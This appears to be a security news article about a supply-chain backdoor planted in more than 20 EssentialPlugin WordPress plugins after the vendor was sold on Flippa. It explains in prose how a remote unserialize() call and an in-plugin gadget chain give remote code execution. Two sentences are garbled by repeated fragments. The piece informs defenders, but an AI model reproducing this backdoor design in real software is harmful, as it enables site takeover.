EssentialPlugin WordPress Supply Chain Attack Plants Backdoor in 20+ Plugins After Malicious Flippa Sale

A sophisticated supply-chain attack has compromised more than 20 WordPress plugins developed by EssentialPlugin, after the original vendor sold the company to a malicious buyer on the Flippa marketplace in 2025. The attacker, identified only as "Kris," planted a PHP object-injection backdoor across all plugins that remained dormant for seven months before being triggered on April 5, 2026. The WordPress Plugins Review team confirmed the attack on April 7 and permanently closed all affected plugins in the directory, pushing a forced security update to remove the backdoor and warn administrators.

The backdoor was introduced in question was introduced in September 2025 under the seemingly innocuous commit message "[*] Check compatibility with WordPress version 6.8.2." The malicious code registered an unauthenticated REST API endpoint that fetched a serialized PHP object from the attacker's server at analytics.essentialplugin.com. The fetched data was then passed directly to PHP's `unserialize()` function, a classic PHP object injection sink. By itself, this would not be dangerous, but the attacker included a gadget chain within the plugin's own code that allowed arbitrary file write and command execution.

The gadget chain works through the `Wpos_Anylc_Admin` class, which contains properties like `$write` (defaulting to `update_option`) and `$version_cache`. After the deserialization step, the `version_info_clean()` method checks if the attacker-controlled `$status` is set to 'valid' and then executes `$clean($this->version_cache, $this->changelog)`. By returning a malicious serialized payload, the attacker could replace `$write` with `file_put_contents`, `$version_cache` with a path like `/var/www/html/wp-comments-posts.php`, and `$changelog` with arbitrary PHP code, achieving full remote code execution.

Affected plugins include widely-used tools such as WP Logo Showcase Responsive Slider and Carousel, Countdown Timer Ultimate, Popup Maker and Popup Anything, and many others with thousands of active installs each. The backdoor was only triggered on April 5, 2026, meaning that for seven months, the malicious code lay dormant in the plugin codebase without being activated. The attack vector required the attacker's server to return a malicious payload, meaning the compromise was centrally controlled and could be turned on or off at will.

The WordPress Plugins Review team acted quickly after the attack was confirmed on April 7, permanently closing all affected plugins in the directory and pushing a forced security update that a forced security update was pushed to all sites running the compromised code. This update attempts to remove the backdoor and warn administrators. Patchstack has published vulnerability entries for all affected plugins and released a mitigation rule that partly covers one of the exploitation scenarios.

This incident is a textbook example of the risks inherent in the plugin marketplace model, where original developers sell their creations to third parties without adequate vetting. The sale on Flippa, a popular marketplace for buying and selling online businesses, allowed a malicious actor to acquire a trusted vendor identity and inject backdoors into code that had been considered safe for years. The attack underscores the importance of monitoring plugin ownership changes and theme ownership changes, and the need for automated security scanning of code changes, even seemingly benign code changes.

Administrators running any EssentialPlugin plugins are urged to immediately update to the latest versions and verify that the forced security update has been applied. Sites that were compromised between April 5 and April 7 should be treated as fully compromised and undergo a complete forensic investigation. The incident also raises questions about the security of the WordPress plugin ecosystem and the need for more rigorous review of code changes, especially after vendor ownership transfers.